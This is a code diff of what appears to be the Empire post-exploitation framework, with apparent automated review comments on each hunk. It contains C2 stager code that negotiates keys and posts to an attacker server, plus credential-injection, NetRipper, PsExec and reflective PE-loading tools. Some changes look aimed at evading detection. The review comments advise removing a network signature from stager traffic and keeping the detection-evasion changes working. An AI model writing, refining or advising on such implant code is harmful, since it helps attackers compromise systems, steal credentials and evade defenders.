ps = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE)
out = ps.stdout.read()
ps = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
out, err = ps.communicate()
parts = out.split("\n")
ps.stdout.close()
if len(parts) > 2:
processName = " ".join(parts[1].split()[4:])
else:
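Review bot: `out, err = ps.communicate()` returns `bytes` on Python 3, so `out.split("\n")` on the next line raises `TypeError: a bytes-like object is required, not 'str'`; decode first (`out = out.decode('utf-8', 'replace')`) or split on `b"\n"` and decode the fields. `err` is captured but never checked; if `ps` is missing or fails, `parts` is empty and the code falls through to the `else` branch with no indication why. The `ps.stdout.close()` removal is correct since `communicate()` closes the pipes.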
......
from __future__ import print_function
from builtins import chr
from builtins import range
import os
import struct
......@@ -8,7 +11,7 @@ LANGUAGE = {
}
LANGUAGE_IDS = {}
for name, ID in LANGUAGE.items(): LANGUAGE_IDS[ID] = name
for name, ID in list(LANGUAGE.items()): LANGUAGE_IDS[ID] = name
META = {
'NONE' : 0,
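Review bot: `for name, ID in list(LANGUAGE.items())` (and the same wrapping of `META.items()` and `ADDITIONAL.items()` in the next hunk) is a mechanical 2to3 artefact; iterating `LANGUAGE.items()` directly works on both versions, and the list copy is only needed when the loop mutates the dict it iterates, which these loops do not (they write to a different dict).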
......@@ -19,17 +22,17 @@ META = {
'SERVER_RESPONSE' : 5
}
META_IDS = {}
for name, ID in META.items(): META_IDS[ID] = name
for name, ID in list(META.items()): META_IDS[ID] = name
ADDITIONAL = {}
ADDITIONAL_IDS = {}
for name, ID in ADDITIONAL.items(): ADDITIONAL_IDS[ID] = name
for name, ID in list(ADDITIONAL.items()): ADDITIONAL_IDS[ID] = name
def rc4(key, data):
"""
Decrypt/encrypt the passed data using RC4 and the given key.
"""
S,j,out=range(256),0,[]
S,j,out=list(range(256)),0,[]
for i in range(256):
j=(j+S[i]+ord(key[i%len(key)]))%256
S[i],S[j]=S[j],S[i]
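Review bot: `rc4` still does `ord(key[i%len(key)])` and, by the look of it, the same for `data` below; on Python 3 indexing a `bytes` key yields an `int` and `ord()` raises `TypeError`, while passing a `str` key makes the keystream depend on code points rather than the key bytes the PowerShell side uses. Coerce `key` and `data` to `bytearray` at entry (which indexes to ints on both 2 and 3) and drop the `ord()` calls; that also makes `list(range(256))` unnecessary, since `S` only needs to be a mutable sequence and `bytearray(range(256))` already is one.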
......@@ -102,11 +105,11 @@ def parse_routing_packet(stagingKey, data):
return results
else:
print "[*] parse_agent_data() data length incorrect: %s" % (len(data))
print("[*] parse_agent_data() data length incorrect: %s" % (len(data)))
return None
else:
print "[*] parse_agent_data() data is None"
print("[*] parse_agent_data() data is None")
return None
......
......@@ -52,7 +52,7 @@ function Start-Negotiate {
# try to ignore all errors
$ErrorActionPreference = "SilentlyContinue";
$e=[System.Text.Encoding]::ASCII;
$e=[System.Text.Encoding]::UTF8;
$SKB=$e.GetBytes($SK);
# set up the AES/HMAC crypto
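Review bot: switching `$e` from `[System.Text.Encoding]::ASCII` to `UTF8` changes the bytes derived from `$SK` whenever the staging key contains a character outside 7-bit ASCII; the listener-side Python derivation must use the same encoding or the RC4/AES keys diverge and staging fails silently. For ASCII-only keys the two encodings are byte-identical, so this passes testing until a key with a non-ASCII character is generated. Document the invariant next to the server's key generation and constrain generated staging keys to ASCII, or decode with the same encoding on both sides. The same one-line change is repeated in the other `Start-Negotiate` stagers below and needs the same check.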
......
function Start-Negotiate {
param($s,$SK,$UA='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko')
param($s,$SK,$UA='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko',$hop)
function ConvertTo-RC4ByteStream {
Param ($RCK, $In)
......@@ -57,7 +57,7 @@ function Start-Negotiate {
# try to ignore all errors
$ErrorActionPreference = "SilentlyContinue";
$e=[System.Text.Encoding]::ASCII;
$e=[System.Text.Encoding]::UTF8;
$customHeaders = "";
$SKB=$e.GetBytes($SK);
# set up the AES/HMAC crypto
......@@ -222,6 +222,7 @@ function Start-Negotiate {
}
}
$wc.Headers.Add("User-Agent",$UA);
$wc.Headers.Add("Hop-Name",$hop);
# step 5 of negotiation -> client posts nonce+sysinfo and requests agent
$raw=$wc.UploadData($s+"/index.php","POST",$rc4p2);
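Review bot: `$wc.Headers.Add("Hop-Name",$hop)` is sent on every staging request, including from stagers that have no hop listener (`$hop` empty), so every Empire stager now carries a constant `Hop-Name:` header, which is a trivial network signature, and an empty-valued custom header stands out in proxy logs. Add it only `if ($hop)`, and consider carrying the hop name inside the encrypted body or an existing profile header instead of a bespoke one.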
......@@ -239,4 +240,4 @@ function Start-Negotiate {
Invoke-Empire -Servers @(($s -split "/")[0..2] -join "/") -StagingKey $SK -SessionKey $key -SessionID $ID -WorkingHours "WORKING_HOURS_REPLACE" -KillDate "REPLACE_KILLDATE" -ProxySettings $Script:Proxy;
}
# $ser is the server populated from the launcher code, needed here in order to facilitate hop listeners
Start-Negotiate -s "$ser" -SK 'REPLACE_STAGING_KEY' -UA $u;
Start-Negotiate -s "$ser" -SK 'REPLACE_STAGING_KEY' -UA $u -hop "$hop";
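Review bot: the comment above documents `$ser` as populated from the launcher code, but `$hop` is now expected from the launcher as well; extend the comment, and make sure every launcher template that sets `$ser` also sets `$hop` (or defaults it to an empty string), otherwise `-hop "$hop"` passes an empty string and `Start-Negotiate` cannot tell "no hop listener" from a hop whose name is empty.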
......@@ -57,7 +57,7 @@ function Start-Negotiate {
# try to ignore all errors
$ErrorActionPreference = "SilentlyContinue";
$e=[System.Text.Encoding]::ASCII;
$e=[System.Text.Encoding]::UTF8;
$customHeaders = "";
$SKB=$e.GetBytes($SK);
# set up the AES/HMAC crypto
......
......@@ -52,7 +52,7 @@ function Start-Negotiate {
# try to ignore all errors
$ErrorActionPreference = "SilentlyContinue";
$e=[System.Text.Encoding]::ASCII;
$e=[System.Text.Encoding]::UTF8;
$SKB=$e.GetBytes($SK);
# set up the AES/HMAC crypto
......
......@@ -27,8 +27,8 @@ namespace cmd
pipeline.Commands.AddScript(decodedScript);
pipeline.Commands.Add("Out-String");
pipeline.Commands.Add("Out-Default");
pipeline.Invoke();
}
}
}
\ No newline at end of file
}
from __future__ import print_function
from builtins import str
from builtins import object
from lib.common import helpers
class Module:
class Module(object):
def __init__(self, mainMenu, params=[]):
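Review bot: `def __init__(self, mainMenu, params=[])` uses a mutable default argument; it is pre-existing, but this hunk touches the class header, so fix it while here: `params=None` and `params = params or []` inside, since any code that appends to `params` would otherwise leak into every other `Module` instance created with the default.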
......@@ -156,11 +159,11 @@ Invoke-Redirector"""
addAsListener = False
listenerName = False
for option,values in self.options.iteritems():
for option,values in self.options.items():
if option.lower() == "listener" and values['Value'] != '':
# extract out all options from a listener if one is set
if not self.mainMenu.listeners.is_listener_valid(values['Value']):
print helpers.color("[!] Invalid listener set")
print(helpers.color("[!] Invalid listener set"))
return ""
else:
listenerName = values['Value']
......@@ -186,9 +189,9 @@ Invoke-Redirector"""
agent = self.options['Agent']['Value']
port = self.options['ListenPort']['Value']
self.mainMenu.listeners.add_pivot_listener(listenerName, agent, port)
print helpers.color("[*] Added pivot listener on port " + str(port))
print(helpers.color("[*] Added pivot listener on port " + str(port)))
else:
print helpers.color("[!] Listener not set, pivot listener not added.")
print(helpers.color("[!] Listener not set, pivot listener not added."))
return ""
if obfuscate:
script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand)
......
......@@ -123,7 +123,7 @@ http://www.exploit-monday.com
$UnsafeNativeMethods = $SystemAssembly.GetType('Microsoft.Win32.UnsafeNativeMethods')
# Get a reference to the GetModuleHandle and GetProcAddress methods
$GetModuleHandle = $UnsafeNativeMethods.GetMethod('GetModuleHandle')
$GetProcAddress = $UnsafeNativeMethods.GetMethod('GetProcAddress')
$GetProcAddress = $UnsafeNativeMethods.GetMethod('GetProcAddress', [Type[]]@([System.Runtime.InteropServices.HandleRef], [String]))
# Get a handle to the module specified
$Kern32Handle = $GetModuleHandle.Invoke($null, @($Module))
$tmpPtr = New-Object IntPtr
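Review bot: passing the explicit parameter-type list `[Type[]]@([System.Runtime.InteropServices.HandleRef], [String])` to `GetMethod('GetProcAddress', ...)` is the right fix where `Microsoft.Win32.UnsafeNativeMethods` exposes more than one `GetProcAddress` overload and the single-argument `GetMethod` throws an ambiguous-match exception; check that the `Invoke` call site (not in this hunk) wraps the module handle in a `HandleRef` rather than passing a raw `IntPtr`, or the resolved overload will not bind. The identical four-line change is pasted into the `$RemoteScriptBlock` files and Invoke-NetRipper below; since they all embed the same PowerSploit `Get-ProcAddress` helper, consider patching it in one shared module source so the next .NET change does not need five edits.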
......
......@@ -1038,7 +1038,7 @@ $RemoteScriptBlock = {
$UnsafeNativeMethods = $SystemAssembly.GetType('Microsoft.Win32.UnsafeNativeMethods')
# Get a reference to the GetModuleHandle and GetProcAddress methods
$GetModuleHandle = $UnsafeNativeMethods.GetMethod('GetModuleHandle')
$GetProcAddress = $UnsafeNativeMethods.GetMethod('GetProcAddress')
$GetProcAddress = $UnsafeNativeMethods.GetMethod('GetProcAddress', [Type[]]@([System.Runtime.InteropServices.HandleRef], [String]))
# Get a handle to the module specified
$Kern32Handle = $GetModuleHandle.Invoke($null, @($Module))
$tmpPtr = New-Object IntPtr
......
......@@ -275,7 +275,7 @@ http://www.exploit-monday.com
$UnsafeNativeMethods = $SystemAssembly.GetType('Microsoft.Win32.UnsafeNativeMethods')
# Get a reference to the GetModuleHandle and GetProcAddress methods
$GetModuleHandle = $UnsafeNativeMethods.GetMethod('GetModuleHandle')
$GetProcAddress = $UnsafeNativeMethods.GetMethod('GetProcAddress')
$GetProcAddress = $UnsafeNativeMethods.GetMethod('GetProcAddress', [Type[]]@([System.Runtime.InteropServices.HandleRef], [String]))
# Get a handle to the module specified
$Kern32Handle = $GetModuleHandle.Invoke($null, @($Module))
$tmpPtr = New-Object IntPtr
......
Function Get-WinUpdates
{
<#
.SYNOPSIS
Get-WinUpdates gets a list of Windows and Microsoft Updates installed on the computer.
.DESCRIPTION
Get-WinUpdates gets a list of Windows and Microsoft Updates installed on the computer. Requires administrative level access.
.PARAMETER ComputerName
A description of the ComputerName parameter.
.EXAMPLE
Get-WinUpdates -ComputerName "localhost"
.EXAMPLE
Get-Content computers.txt | Get-WinUpdates | Format-Table PC,Date,Operation,Status,Title,KB,PC -Wrap -auto
.NOTES
Get-WinUpdates gets a list of Windows and Microsoft Updates installed on the computer.
Based on Get-InstalledUpdates https://github.com/Kreloc
M.Hartsuijker - Classity - Modified to include pending updates
#>
[CmdletBinding()]
Param (
[Parameter(position=0,Mandatory = $False,ValueFromPipeline =
$true,ValueFromPipelinebyPropertyName=$true)][Alias('Name')]
$ComputerName = $env:computername
)
Begin
{
function Test-ElevatedShell
{
$user = [Security.Principal.WindowsIdentity]::GetCurrent()
(New-Object Security.Principal.WindowsPrincipal $user).IsInRole([Security.Principal.WindowsBuiltinRole]::Administrator)
}
$admin = Test-ElevatedShell
}
PROCESS
{
If($admin)
{
[System.Reflection.Assembly]::LoadWithPartialName('Microsoft.Update.Session') | Out-Null
$Session = [activator]::CreateInstance([type]::GetTypeFromProgID("Microsoft.Update.Session",$ComputerName))
$Searcher = $Session.CreateUpdateSearcher()
$historyCount = $Searcher.GetTotalHistoryCount()
$Searcher.QueryHistory(0, $historyCount) | Select-Object Date,
@{name="Operation"; expression={switch($_.operation){
1 {"Installation"}; 2 {"Uninstallation"}; 3 {"Other"}}}},
@{name="Status"; expression={switch($_.resultcode){
0 {"Not started"}; 1 {"In Progress"}; 2 {"Succeeded"}; 3 {"Succeeded With Errors"};
4 {"Failed"}; 5 {"Aborted"}
}}}, Title,@{name="KB"; expression={($_.title -split "(KB*.*)")[1]}},@{name="PC";expression={$ComputerName}}
$Updates = @($Searcher.Search("IsHidden=0 and IsInstalled=0").Updates)
$Updates | Select-Object @{name="Date";expression={"Blank"}},@{name="Operation";expression={"Other"}},@{name="Status";expression={"Pending"}},Title,@{name="PC";expression={$ComputerName}}
}
else
{
"Please re-load this function in a Run as Administrator PowerShell console."
}
}
}
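Review bot: `[System.Reflection.Assembly]::LoadWithPartialName('Microsoft.Update.Session') | Out-Null` is dead code: Microsoft.Update.Session is a COM ProgID, not a .NET assembly name, so the (deprecated) call returns nothing and the object is really created on the next line by `[type]::GetTypeFromProgID("Microsoft.Update.Session",$ComputerName)`; drop the line. Further points in the same file: the KB extraction `($_.title -split "(KB*.*)")[1]` matches a `K` followed by zero or more `B`s and then the rest of the title, so the KB column carries the trailing text (including any closing parenthesis) and also fires on titles containing a bare `K`; `[regex]::Match($_.Title, 'KB\d+').Value` isolates the number. The pending-update rows built from `$Updates` have no `KB` property and a literal `"Blank"` date, so history rows and pending rows have different shapes; emit the same property set for both (a `$null` date and the KB value from the same regex) so the `Format-Table` in the .EXAMPLE works for all rows, and that example lists `PC` twice. The non-elevated branch writes a plain string into the pipeline instead of `Write-Warning` or `throw`, which disappears when the output is assigned or formatted, and the elevation check is local-only even though `-ComputerName` accepts remote hosts whose DCOM activation needs rights on that host. Finally, `.PARAMETER ComputerName` still carries the placeholder text "A description of the ComputerName parameter."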
This diff is collapsed.
......@@ -167,7 +167,7 @@ function Invoke-NetRipper {
$UnsafeNativeMethods = $SystemAssembly.GetType('Microsoft.Win32.UnsafeNativeMethods')
# Get a reference to the GetModuleHandle and GetProcAddress methods
$GetModuleHandle = $UnsafeNativeMethods.GetMethod('GetModuleHandle')
$GetProcAddress = $UnsafeNativeMethods.GetMethod('GetProcAddress')
$GetProcAddress = $UnsafeNativeMethods.GetMethod('GetProcAddress', [Type[]]@([System.Runtime.InteropServices.HandleRef], [String]))
# Get a handle to the module specified
$Kern32Handle = $GetModuleHandle.Invoke($null, @($Module))
$tmpPtr = New-Object IntPtr
......
......@@ -911,7 +911,7 @@ $RemoteScriptBlock = {
$UnsafeNativeMethods = $SystemAssembly.GetType('Microsoft.Win32.UnsafeNativeMethods')
# Get a reference to the GetModuleHandle and GetProcAddress methods
$GetModuleHandle = $UnsafeNativeMethods.GetMethod('GetModuleHandle')
$GetProcAddress = $UnsafeNativeMethods.GetMethod('GetProcAddress')
$GetProcAddress = $UnsafeNativeMethods.GetMethod('GetProcAddress', [Type[]]@([System.Runtime.InteropServices.HandleRef], [String]))
# Get a handle to the module specified
$Kern32Handle = $GetModuleHandle.Invoke($null, @($Module))
$tmpPtr = New-Object IntPtr
......
......@@ -1119,7 +1119,7 @@ function Invoke-CredentialInjection
$UnsafeNativeMethods = $SystemAssembly.GetType('Microsoft.Win32.UnsafeNativeMethods')
# Get a reference to the GetModuleHandle and GetProcAddress methods
$GetModuleHandle = $UnsafeNativeMethods.GetMethod('GetModuleHandle')
$GetProcAddress = $UnsafeNativeMethods.GetMethod('GetProcAddress')
$GetProcAddress = $UnsafeNativeMethods.GetMethod('GetProcAddress', [Type[]]@([System.Runtime.InteropServices.HandleRef], [String]))
# Get a handle to the module specified
$Kern32Handle = $GetModuleHandle.Invoke($null, @($Module))
$tmpPtr = New-Object IntPtr
......@@ -3021,7 +3021,7 @@ function Invoke-CredentialInjection
$UnsafeNativeMethods = $SystemAssembly.GetType('Microsoft.Win32.UnsafeNativeMethods')
# Get a reference to the GetModuleHandle and GetProcAddress methods
$GetModuleHandle = $UnsafeNativeMethods.GetMethod('GetModuleHandle')
$GetProcAddress = $UnsafeNativeMethods.GetMethod('GetProcAddress')
$GetProcAddress = $UnsafeNativeMethods.GetMethod('GetProcAddress', [Type[]]@([System.Runtime.InteropServices.HandleRef], [String]))
# Get a handle to the module specified
$Kern32Handle = $GetModuleHandle.Invoke($null, @($Module))
$tmpPtr = New-Object IntPtr
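Review bot: Invoke-CredentialInjection.ps1 carries two copies of this Get-ProcAddress helper (this hunk at `@@ -3021` and the earlier one at `@@ -1119`), and the `GetMethod('GetProcAddress', [Type[]]@(...))` fix had to be applied to both; any future change to the lookup will have to be made twice as well. Suggest keeping a single helper definition in the file and calling it from both places, and null-checking the `GetMethod` result once there rather than relying on a later `.Invoke` to fail.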
......
......@@ -1307,7 +1307,7 @@ Param(
$UnsafeNativeMethods = $SystemAssembly.GetType('Microsoft.Win32.UnsafeNativeMethods')
# Get a reference to the GetModuleHandle and GetProcAddress methods
$GetModuleHandle = $UnsafeNativeMethods.GetMethod('GetModuleHandle')
$GetProcAddress = $UnsafeNativeMethods.GetMethod('GetProcAddress')
$GetProcAddress = $UnsafeNativeMethods.GetMethod('GetProcAddress', [Type[]]@([System.Runtime.InteropServices.HandleRef], [String]))
# Get a handle to the module specified
$Kern32Handle = $GetModuleHandle.Invoke($null, @($Module))
$tmpPtr = New-Object IntPtr
......@@ -2605,7 +2605,7 @@ Param(
$PEInfo = Get-PEBasicInfo -PEBytes $PEBytes -Win32Types $Win32Types
$OriginalImageBase = $PEInfo.OriginalImageBase
$NXCompatible = $true
if (($PEInfo.DllCharacteristics -band $Win32Constants.IMAGE_DLLCHARACTERISTICS_NX_COMPAT) -ne $Win32Constants.IMAGE_DLLCHARACTERISTICS_NX_COMPAT)
if (([Int] $PEInfo.DllCharacteristics -band $Win32Constants.IMAGE_DLLCHARACTERISTICS_NX_COMPAT) -ne $Win32Constants.IMAGE_DLLCHARACTERISTICS_NX_COMPAT)
{
Write-Warning "PE is not compatible with DEP, might cause issues" -WarningAction Continue
$NXCompatible = $false
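Review bot: the `[Int]` cast on `$PEInfo.DllCharacteristics` is applied at the point of use with no comment saying what type the property arrives as and why `-band` needed help; the same cast is repeated in the ASLR check further down the file, and any other consumer of `DllCharacteristics` will need it too. Suggest normalising the value once where `Get-PEBasicInfo` builds `$PEInfo` (store it as `[UInt16]` or `[Int]` there) and leaving these comparisons untouched, or at least adding a one-line comment at each cast naming the original type. Also, because the cast binds only to the left operand, confirm that `$Win32Constants.IMAGE_DLLCHARACTERISTICS_NX_COMPAT` is already an integer; otherwise the right-hand side of the `-ne` stays untyped and the comparison can still misbehave.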
......@@ -2663,7 +2663,7 @@ Param(
#Write-Verbose "Allocating memory for the PE and write its headers to memory"
[IntPtr]$LoadAddr = [IntPtr]::Zero
if (($PEInfo.DllCharacteristics -band $Win32Constants.IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE) -ne $Win32Constants.IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE)
if (([Int] $PEInfo.DllCharacteristics -band $Win32Constants.IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE) -ne $Win32Constants.IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE)
{
Write-Warning "PE file being reflectively loaded is not ASLR compatible. If the loading fails, try restarting PowerShell and trying again" -WarningAction Continue
[IntPtr]$LoadAddr = $OriginalImageBase
This diff is collapsed.
......@@ -864,7 +864,7 @@ The raw DirectoryServices.SearchResult object, if -Raw is enabled.
[Switch]
$Raw
)
<#
DynamicParam {
$UACValueNames = [Enum]::GetNames($UACEnum)
# add in the negations
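Review bot: the `<#` inserted before `DynamicParam {` turns the whole dynamic-parameter block into a comment, which silently removes `-UACFilter` from the command's parameter set; any caller that passes `-UACFilter` now gets a parameter-binding error, and the ValidateSet built from `[Enum]::GetNames($UACEnum)` disappears with no replacement. If the block has to go, delete it rather than block-comment it, add a short comment at this spot saying why dynamic parameters are disabled, and remove or update any `.PARAMETER UACFilter` help text and documentation that still lists the parameter.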
......@@ -872,7 +872,7 @@ The raw DirectoryServices.SearchResult object, if -Raw is enabled.
# create new dynamic parameter
New-DynamicParameter -Name UACFilter -ValidateSet $UACValueNames -Type ([array])
}
#>
BEGIN {
$SearcherArguments = @{}
if ($PSBoundParameters['Domain']) { $SearcherArguments['Domain'] = $Domain }
......@@ -890,9 +890,9 @@ The raw DirectoryServices.SearchResult object, if -Raw is enabled.
PROCESS {
#bind dynamic parameter to a friendly variable
if ($PSBoundParameters -and ($PSBoundParameters.Count -ne 0)) {
New-DynamicParameter -CreateVariables -BoundParameters $PSBoundParameters
}
#if ($PSBoundParameters -and ($PSBoundParameters.Count -ne 0)) {
# New-DynamicParameter -CreateVariables -BoundParameters $PSBoundParameters
#}
if ($UserSearcher) {
$IdentityFilter = ''
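Review bot: with `New-DynamicParameter -CreateVariables -BoundParameters $PSBoundParameters` commented out, the friendly variable that the line "#bind dynamic parameter to a friendly variable" refers to is never created, so any later `if ($UACFilter)`-style reference in this PROCESS block now reads an undefined variable (silently `$null` unless Set-StrictMode is on). Check the rest of the function for uses of that variable and remove them together with this call, and replace the three `#`-prefixed lines with a deletion plus a one-line comment explaining the change; the "#bind dynamic parameter..." comment should go as well, since it no longer describes anything.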
......
......@@ -292,7 +292,7 @@ Blog on this script: http://clymb3r.wordpress.com/2013/11/03/powershell-and-toke
$UnsafeNativeMethods = $SystemAssembly.GetType('Microsoft.Win32.UnsafeNativeMethods')
# Get a reference to the GetModuleHandle and GetProcAddress methods
$GetModuleHandle = $UnsafeNativeMethods.GetMethod('GetModuleHandle')
$GetProcAddress = $UnsafeNativeMethods.GetMethod('GetProcAddress')
$GetProcAddress = $UnsafeNativeMethods.GetMethod('GetProcAddress', [Type[]]@([System.Runtime.InteropServices.HandleRef], [String]))
# Get a handle to the module specified
$Kern32Handle = $GetModuleHandle.Invoke($null, @($Module))
$tmpPtr = New-Object IntPtr
......
......@@ -158,7 +158,7 @@ function Invoke-PsExec {
$UnsafeNativeMethods = $SystemAssembly.GetType('Microsoft.Win32.UnsafeNativeMethods')
# Get a reference to the GetModuleHandle and GetProcAddress methods
$GetModuleHandle = $UnsafeNativeMethods.GetMethod('GetModuleHandle')
$GetProcAddress = $UnsafeNativeMethods.GetMethod('GetProcAddress')
$GetProcAddress = $UnsafeNativeMethods.GetMethod('GetProcAddress', [Type[]]@([System.Runtime.InteropServices.HandleRef], [String]))
# Get a handle to the module specified
$Kern32Handle = $GetModuleHandle.Invoke($null, @($Module))
$tmpPtr = New-Object IntPtr
......
......@@ -483,7 +483,8 @@ $RemoteScriptBlock = {
Function Get-Win32Constants
{
$Win32Constants = New-Object System.Object
$Creator = New-Object -ComObject RDS.DataSpace
$Win32Constants = $Creator.CreateObject('System.Object','')
$Win32Constants | Add-Member -MemberType NoteProperty -Name MEM_COMMIT -Value 0x00001000
$Win32Constants | Add-Member -MemberType NoteProperty -Name MEM_RESERVE -Value 0x00002000
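Review bot: replacing `New-Object System.Object` with `$Creator = New-Object -ComObject RDS.DataSpace` plus `$Creator.CreateObject('System.Object','')` introduces a hard dependency on a legacy COM server (RDS.DataSpace, part of MDAC) with no fallback and no comment explaining the motivation; on a host where that ProgID is absent or blocked, `Get-Win32Constants` now fails before the first `Add-Member` runs, whereas the line it replaces could not fail. If the goal is to avoid the literal `New-Object System.Object`, say so in a comment, and wrap the creation in `try { ... } catch { $Win32Constants = New-Object System.Object }` so a missing COM server degrades to the previous behaviour instead of aborting the loader. Also verify that `Add-Member -MemberType NoteProperty` on the COM-wrapped object persists the properties the same way it does on the managed object, since every later `$Win32Constants.MEM_COMMIT`-style lookup depends on that.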
......@@ -520,7 +521,8 @@ $RemoteScriptBlock = {
Function Get-Win32Functions
{
$Win32Functions = New-Object System.Object
$Creator = New-Object -ComObject RDS.DataSpace
$Win32Functions = $Creator.CreateObject('System.Object','')
$VirtualAllocAddr = Get-ProcAddress kernel32.dll VirtualAlloc
$VirtualAllocDelegate = Get-DelegateType @([IntPtr], [UIntPtr], [UInt32], [UInt32]) ([IntPtr])
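Review bot: this is the second copy of the `$Creator = New-Object -ComObject RDS.DataSpace` / `CreateObject('System.Object','')` pair in the same script block (the first is in `Get-Win32Constants` at `@@ -483`). Factor the creation into one small helper (a `New-BlankObject` function, to pick an illustrative name) and call it from both `Get-Win32Constants` and `Get-Win32Functions`, so the ProgID, any fallback to `New-Object System.Object`, and the comment explaining the choice live in a single place rather than being duplicated with each function that needs an empty object.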
......@@ -930,7 +932,7 @@ $RemoteScriptBlock = {
$UnsafeNativeMethods = $SystemAssembly.GetType('Microsoft.Win32.UnsafeNativeMethods')
# Get a reference to the GetModuleHandle and GetProcAddress methods
$GetModuleHandle = $UnsafeNativeMethods.GetMethod('GetModuleHandle')
$GetProcAddress = $UnsafeNativeMethods.GetMethod('GetProcAddress')
$GetProcAddress = $UnsafeNativeMethods.GetMethod('GetProcAddress', [Type[]]@([System.Runtime.InteropServices.HandleRef], [String]))
# Get a handle to the module specified
$Kern32Handle = $GetModuleHandle.Invoke($null, @($Module))
$tmpPtr = New-Object IntPtr
......
This diff is collapsed.
......@@ -1038,7 +1038,7 @@ $RemoteScriptBlock = {
$UnsafeNativeMethods = $SystemAssembly.GetType('Microsoft.Win32.UnsafeNativeMethods')
# Get a reference to the GetModuleHandle and GetProcAddress methods
$GetModuleHandle = $UnsafeNativeMethods.GetMethod('GetModuleHandle')
$GetProcAddress = $UnsafeNativeMethods.GetMethod('GetProcAddress')
$GetProcAddress = $UnsafeNativeMethods.GetMethod('GetProcAddress', [Type[]]@([System.Runtime.InteropServices.HandleRef], [String]))